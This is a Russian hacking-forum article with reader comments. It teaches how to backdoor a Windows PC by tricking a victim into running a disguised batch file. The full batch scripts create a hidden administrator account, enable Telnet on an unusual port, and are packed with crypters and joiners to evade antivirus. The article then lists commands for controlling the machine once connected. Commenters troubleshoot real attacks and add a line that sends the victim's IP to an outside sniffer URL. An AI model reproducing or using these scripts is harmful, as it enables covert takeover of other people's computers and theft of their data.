Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Взлом через TELNET Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Взлом через TELNET

08.11.2008

Всем привет! Все больше и больше я вижу, как новички задают одни и те же вопросы на форуме, в чате, в аськах, такие как: Что такое телнет? Как им пользоваться? Зачем он нужен? Поэтому я решил в помощь им написать эту статью. В этой статье я попробую объяснить как с помощью такого универсального сервиса, как телнет, можно проникнуть в файловую систему удалённого по сети компа, и полностью управлять им, отдавая команды. Но прежде чем действовать давайте узнаем, что за такая служба телнет.

Телнет - сетевой протокол для работы в удаленной системе в терминальном режиме (т.е. режиме командной строки). Все делается "ручками", мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал, позволяющая нам подключаться к удаленным компьютерам.

Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у жертвы. Бывает такое, что этот сервис уже будет весить у "врага", но при попытки подключится 90% того, что он потребует пасс, можно конечно попробовать брутить, но вероятность успеха очень маленькая. Для взлома можно воспользоваться таким методом как социальная инженерия(СИ). Я думаю не надо объяснять что это такое.  Если вы думаете, что СИ никак не относится к хакерству то вы ошибаетесь, этот метод в данном случае наиболее актуален. Для того, чтобы открыть телнет, жертве необходимо будет запустить созданый тобой файл, который ей можно подарить. При запуске его он пропишит нужный тебе порт, на котором будет висеть телнет, нужный логин и пасс. Его можно запросто написать на языке Bat, т.е. язык команд в GUI окне в среде Windows(режим командной строки).

Тело батника:

chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
или так
chcp 1251
net user SUPPORT_388945a0 /delete
net user support hacker /add
net localgroup Администраторы support /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "support" /t reg_dword /d 0 y
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

все это пишешь в блокноте, и сохраняем как *.bat

Теперь пояснения:
chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке.
net user SUPPORT_388945a0 /delete и
net localgroup Пользователи SUPPORT_388945a0 /del - удаляют стандартную
первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server.
net user hacker hack /add и
net localgroup Администраторы hacker /add - не трудно догадаться, что этими
командами создаётся новая учетная запись с админскими правами,
где логин: hacker
пасс: hack

Так как при создании нового админа он будет виден в welcome screen'е, отключить его
можно импортировав рег файл в реестр, следующего содержания:
Содержимое conf.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"hacker"=dword:00000000

Сервис телнет по умолчанию отключен, но есть такая команда
 
sc config tlntsvr start=auto

которая меняет тип его запуска на автоматический(по дефолту disabled ).
При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это палевно, поэтому советую прописывать этой командой tlntadmn config port=972 sec=-NTLM , редко используемый порт. В нашем случае это 972. Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet  окончательно запустит наш бэкдор.

Теперь проверим правильный ли синтаксис кода. Открываем командную строку, если она потерялась можно найти её здесь c:\WINDOWS\system32\cmd.exe. Вставляем код, запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так:

Пуск -> Выполнить -> пишем services.msc -> Ok

Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и смотришь её свойства. При необходимости в любой момент можно её отключить.

Вот батник готов, и как ты видишь он слишком палевны, при его запуске вылетает консольное черное окно, говорящее о выполняемых процессах в командной строке. Но не все так плохо, тебе поможет такая прога, как QuickBatchFileCompiler http://ifolder.ru/7197807. Она компилирует пакетные bat-, cmd- и vb-файлы в исполняемые *.exe. И батник превратится в скрытый *.exe файл, ну скрытый конечно не в прямом смысле. Вроде готово... Но не совсем, ты же не будешь дарить пустой экзешник, поэтому бери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можно скачать тут http://ifolder.ru/7198272 (pohernah107(13 кб), а джойнер можешь взять здесь http://ifolder.ru/7197872 (RedBindeR_v1.3_Mod(460 кб)) . Они помогут тебе склеить файлы в один и изменить сигнатуру дабы не палится антивирусами. Допустим, жертва повелась на эти уловки и запустила файл. Зная IP своей жертвы тебе осталось только подключится к телнету через указанный тобой порт. Бывает так что жертва находится в глобальной сети www у которой IP динамический, в этом случаи, зная диапазон IP его провайдера можно просканировать эту сеть на открытый наш редко используемый 972 Порт. А чтобы знать когда твой "друг" в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент. Осталось подключится. Для этого можешь выбрать стандартный виндовый клиент который находится тут c:\WINDOWS\system32\telnet.exe.
Запускаешь. Пишешь:
Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт]
если пишет:
Welcome to Microsoft Telnet Service
login:_
то всё акей =))
Вводишь:
login: hacker
password: hack
Появляется надпись:
*=====================================================
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*=====================================================
C:>_

Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь управлять кампом, отдавая команды...
Можно к примеру расшарить диски:

C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul

перезагрузить комп:
C:>shutdown -r -t 1 -c -f

прописать какой-нибудь ключ реестра:

C:>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f -

который запретит доступ к нему

или поднять ftp сервер и залить радмина для более удобного удаленного администрирования:

C:>ftp

В общем-то, здесь уже играет фантазия взломщика =)

Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире.

P.S. На все непонятные термины и выражения есть Google.

Внимание!!! Данная статья - это не побуждение к действию, все описанное здесь попадает под действие УК РФ. Я пишу это только для ознакомления, и в целях вашей информационной безопасности

GivioN

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Взлом
Опубликовал: RenGO
Просмотров: 98544
Проголосовало через SMS: 0
Ключевые слова: telnet, взлом, (найти похожие документы)
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
хорошая статья
08.11.2008 / Tix
Спасиб пробовал не раз. Работает.
09.11.2008 / Bb0y
хорошая статья
Без сомнения просто отличная легкая в понимании статья, но я застрял на одном из шагов.RenGO можно узнать твою аську?)Ну или ответьте мне хотя бы тут...
Вообшем так ступор у меня на стадии когда мне надо вводить логин, я ввожу свой логин,ввожу пасс хотя в строке пасс никак не отображается он далее
Появляется надпись:
 
    *=====================================================
    Вас приветствует Telnet-сервер производства корпорации Майкрософт
    *=====================================================
    C:>_
и вот в поле C:>_ я не могу ничего ввести.Что я не так сделал/делаю?Заранее благодарен
09.11.2008 / amenosky
а если жертва НЕ ИЗ МОЕЙ сети то работать тож будет?
09.11.2008 / HACK_ER
Все нормально amenosky, так telnet и должен работать. Если пасс не отображается это вовсе не значит,  что он не передается удаленному серверу. Просто вводиш логин и пасс и жмеш ентер, и все должно быть окей.
10.11.2008 / radion_
Все хорошо написано, по больше бы таких статей где все популярно рассмотренно.
14.11.2008 / Alexandrius
Это у меня антивирь глючит или это реально вирус по ссылке http://ifolder.ru/7198272  (пабличный криптор)
15.11.2008 / daniel
Ребята, да тут сплошные трояны)))
 
Обнаружено: Trojan-Dropper.Win32.RedBinder.a Internet Explorer http://stg440.ifolder.ru/download/?7197872&cATTNDfLHq47fU1ygys4ig%3D%3D//RedbindeR v1.3 Mod.exe
 
Это у нас джоинер такой, интересно не так ли?
 
Обнаружено: HackTool.Win32.Crypt.c Internet Explorer http://stg774.ifolder.ru/download/?7198272&CMshKwGV65A1zGspZjYB9Q%3D%3D//pohernah107/107/Pohernah.exe
 
А это криптор. Ну HackTool это не страшно конечно, но Trojan Dropper это уже слишком! Для справки:
 
"Троянские программы этого класса написаны в целях скрытной инсталляции других программ и практически всегда используются для «подсовывания» на компьютер-жертву вирусов или других троянских программ.
Данные троянцы обычно без каких-либо сообщений (либо с ложными сообщениями об ошибке в архиве или неверной версии операционной системы) сбрасывают на диск в какой-либо каталог (в корень диска C:, во временный каталог, в каталоги Windows) другие файлы и запускают их на выполнение.
В результате использования программ данного класса хакеры достигают двух целей:
- скрытная инсталляция троянских программ и/или вирусов;
- защита от антивирусных программ, поскольку не все из них в состоянии проверить все компоненты внутри файлов этого типа."
 
Вот так горе-хакеры сами становятся взломанными и протрояненными. Авторам "спасибо" за ссылки.
03.12.2008 / LoDo
Все сделал как в статье, файл знаю сто процентов запущен, который подсунул.
Но вот пишет что.:
 
Access Denied: Specified user is not a member of TelnetClients group.
Server administrator must add this user to the above group.
 
Telnet Server has closed the connection
 

Подключение к узлу утеряно.
 
Что делать? И почему?
09.12.2008 / norules_05
Доступ запрещен: Пользователь не является членом группы TelnetClients
Администратор сервера должен добавить этого пользователя в указанную группу
 
Telnet Server закрыл соединение
09.12.2008 / RenGO
Делать это, например:
 
net localgroup TelnetClients hacker /add
 
Вероятно, администраторам запрещен удаленный вход телнетом. Однако, можно разрешить через gpedit
 
12.12.2008 / elvisghost
Народ,тут такая проблема)))вобщем батник запускали на компе,но при попытке подсоединиться к нему появляется такая надпись:
 

Microsoft Telnet> o 10.10.244.248 972
Подключение к 10.10.244.248...Не удалось открыть подключение к этому узлу,на порт 972:Сбой подключения
 

Плиз,помогите кто может!!!!
04.01.2009 / JAcK696969
а как IPшник жертвы узнать если эта мр**ь не мхочет ни каких писем тебе отсылать и висит только в Агенте???
11.01.2009 / BSkull
Извиняюсь конечно, я в этом деле просто убер новичёк))) но то что было написано ранее у меня не совсем работало. точнее не работало чтобы хакерский юзер был скрыт при входе. можно было сделать чтобы это делалось когда создаёшь отдельный файл реестра, а вот через батник никак не выходило
Я сделал немного по-другому и получился вот такой вот батник, всё работает:
 
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker /t REG_DWORD /d 00000000

 
Кстати намыл прогу которая шифрует экзкшник в картинку. т.е. никакого ехе расширения. ток вот опять проблема. не работает))) может кто знает и поможет=) где прогу нашёл не помню, линк дать не могу. если кому интересно стучите в асю: 478449083. может вместе разберёмся.
Спасибо.
02.02.2009 / superseven
Я что то не пойму, эта фишка действует не по сети, а через инет?
Если да , то эт всё канешно хорошо, но 972 порт надо прокидывать на удалённом компе, если он не прокинут, то соединения не будет. Надо искать  открытый и свободный порт, чтобы прописать его в батнике, или я что то не правильно понял?
18.02.2009 / darkness666
Обнаружено: Trojan-Dropper.Win32.RedBinder.a Internet Explorer http://stg440.ifolder.ru/download/?7197872&cATTNDfLHq47fU1ygys4ig%3D%3D//RedbindeR v1.3 Mod.exe антивирь такую же фигню выдает.а если на антивире делаешь пропустить.файл вообще не запускается. пишет у вас нет прав на использование.че за фигня?
22.02.2009 / Kroner
парни извините за столь неимоверно наивный вопрос, но как этот батник отправить и сделать так чтобы его там запустили? это сервак, и там сидят злые админы, с которыми шутки плохи! знаю только айпи. заранее спс.
20.03.2009 / brutus
Kroner
Обнаружено: Trojan-Dropper.Win32.RedBinder.a Internet Explorer http://stg440.ifolder.ru/download/?7197872&cATTNDfLHq47fU1ygys4ig%3D%3D//RedbindeR v1.3 Mod.exe антивирь такую же фигню выдает.а если на антивире делаешь пропустить.файл вообще не запускается. пишет у вас нет прав на использование.че за фигня?
У тя касперский стоит!? А в нем если выбираешь пропустить то он файл не обрабатывает а доступ к нему запрещяет. Добавь файлик в доверенную зону
01.04.2009 / Acid_Zero
BiggrinВО прикол)))))пропустите троя товарищи к себе в довереную зону
04.05.2009 / g0r1um
НАРОД!! Плиз помогите .. все нормально, но как только вводишь login а потом  password(его не отображает!!), пишит "Login Failed" "имя пользователя и пароля не определенны" .. что делать???
 
ввожу..
login: hacker
password: hack
 
может не то??
 
плиз помогите,жду
01.06.2009 / ukr_dude
Огромное спасибо за статью.
Но есть вопрос. На ХР всё работает замечательно. А вот на Vista я службы telnet не нашёл. Она там есть вообще?
10.09.2009 / Antonpersempre
g0r1um тут дело в буквах.... я ужас сколько трахался с этим телнетом пока не допер что нужно числовие имена давать... в общем задай имя пользователя и пароль в числовом виде (не знаю почему но где то это работает а где то нет) и все должно проканать
20.02.2010 / TreaDy
g0r1um тут дело в буквах.... я ужас сколько трахался с этим телнетом пока не допер что нужно числовие имена давать... в общем задай имя пользователя и пароль в числовом виде (не знаю почему но где то это работает а где то нет) и все должно проканать
20.02.2010 / TreaDy
g0r1um тут дело в буквах.... я ужас сколько трахался с этим телнетом пока не допер что нужно числовие имена давать... в общем задай имя пользователя и пароль в числовом виде (не знаю почему но где то это работает а где то нет) и все должно проканать
20.02.2010 / TreaDy
Всем привет если можете подскажите.
Я к примеру использовал Вот этот код:
chcp 1251
 
net user admin admin /add
 
net localgroup Администраторы admin /add
 
sc config tlntsvr start= auto
 
tlntadmn config port=23 sec=-NTLM
 
net start Telnet
 
REG ADD "HKLM\SOFTWARE\Microsoft\Win
dowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList\admin" /v admin /t reg_d
word /d 0000000
 
rundll32 url.dll, FileProtocolHandler http://httpz.ru/n6jzraa94ob.gif
 
добавил к нему rundll32 url.dll, FileProtocolHandler http://httpz.ru/n6jzraa94ob.gif это если жертва его запустит то его IP отошлётся мне на снифер.
В общем проблема не в этом у меня всё норм жертва запускает IP приходит, захожу на комп жертвы любой процес вырубить могу бес проблем но залить через FTP не чего ей не могу.
пишу ftp:>o
k УКАЗЫВАЮ FTP СЕРВЕР ЖМУ ЕНТР ВВОЖУ ЛОГИН ПАС ВРОДЕ ВСЁ Я НА FTP НО КОГДА Я ХОЧУ ПРОСМОТРЕТЬ ЧТО У МЕНЯ ЛЕЖИТ НА FTP пример:
ftp:> dir
ОН МНЕ ПИШЕТ NO FILE ТИПА ТОГО ЧТО У МЕНЯ НА FTP НЕ ЧЕГО НЕТ ЧО Х....
Я уже и так думал типа чот сума Телнет сходит пишу для заливки в примеру xinch.exe
ftp:> get xinch.exe
ПИШЕТ ТАКУЮ ЖЕ Х... NO FILE.
У МЕНЯ ВОПРОС В ЧОМ МОЖЕД БЫТЬ ПРОБЛЕМА?
И ещё я попадаю типа как в эту директорию жертвы С:\Documents and Settings\admin\
Я к примеру хочу как у Вас здесь сказано расшарить жертве диск С пишу:
C:>net share disk_c=c: > nul БОРОДА НЕ ПРОКАТЫВАЕТ ПИШУ ТАК КАК ПОПАЛ К ЖЕРТВЕ
С:\Documents and Settings\admin\ net share disk ЖМУ ЭНТ И ПРИ ПАВТОРЕ ЭТОЙ КОМАНДЫ МНЕ ПИШЕТ ЧТО ДАННЫЙ РЕСУРС УЖЕ РАСШАРЕН. Потом я беру сканер расшареных ресурсов я брал и Essentials Net Tools и Shared Resource Scanner РАСШАРЕНЫХ РЕСУРСОВ НЕ ТА НЕ ТА ПРОГА НЕ НАХОДИТ ХОТЯ В ТЕЛНЕТ ВЫДОЁТ ЧТО ДАННЫЙ РЕСУРС РАСШАРЕН.
Подскажите и здесь в чом может быть проблема?
Зарание спасибо.
 

17.04.2010 / xaker-26
у меня порт все равно не открывает,че за нах не пойму,с батниками поверхностно только знаком...
плюс еще этот батник каспер сразу же палит,а вот если его на 4 батника разделить к примеру)...все норм)))
 
Microsoft Telnet> o 10.10.244.248 972
Подключение к 10.10.244.248...Не удалось открыть подключение к этому узлу,на порт 972:Сбой подключени
 
что за нах и че с этим делать?
такая хрень даже на моем компе,когда проверяю...
порт менял,че то не помогает(
08.11.2010 / keylogger45
помогите с батником под 7-ку. антивируса нет. 7-ка максмимальная
12.12.2010 / mp-jet
помогите с батником под 7-ку. антивируса нет. 7-ка максмимальная
12.12.2010 / mp-jet
помогите с батником под 7-ку. антивируса нет. 7-ка максмимальная
12.12.2010 / mp-jet
Обьясняю для keylogger45 - у тебя и будет всегда сбой подключения, так как ты пытаешься через Интернет подключиться к IP-адресу,который никогда в сети не ходил и ходить не будет...Адреса,начинающиеся с 10. зарезервированы только для локальных сетей...Твой товарищ 100% находится за NATом и попасть к нему так просто не сможешь...
21.01.2011 / SILVERT
у меня когда подключается вылетает надпись "Нажмите любую клавишу", если нажимаешь то вылетает и надпись "Подключение к узлу утеряно". чё делать помогите?(я в этом деле новенький)
05.07.2011 / _besT_
Microsoft Telnet> o 10.54.192.1 972
Подключение к 10.10.244.248...Не удалось открыть подключение к этому узлу,на порт 972:Сбой подключения
27.09.2011 / dimarin
уважаемые хакеры, почему-то у меня не находит команду tlntadmn. С чем это может быть связано?
11.05.2013 / more_skills
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Предложения работы » Взлом инста, логин с не активной страницы
  • Взлом и безопасность / Программы » Нужна помощь доброго взломщика программы Quot pro
  • Взлом и безопасность / Тест на уязвимости » Прошу проверить сайты на одном сервере.
  • Взлом и безопасность / Программы » Прошу взломать программу
  • Взлом и безопасность / Программы » Re: Нужно взломать две программы power-equilab и piosolver
  • Разное / Предложения работы » Konkurenti bombyat mou reklamu, ishu pomosch v nakazanii !
  • Разное / Продам, отдам » Закрыто
  • Взлом и безопасность / Фрикинг » Re: Нужно отвязать скрипт от лицензии. кто поможет?
  • Взлом и безопасность / Фрикинг » Нужно отвязать скрипт от лицензии. кто поможет?

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}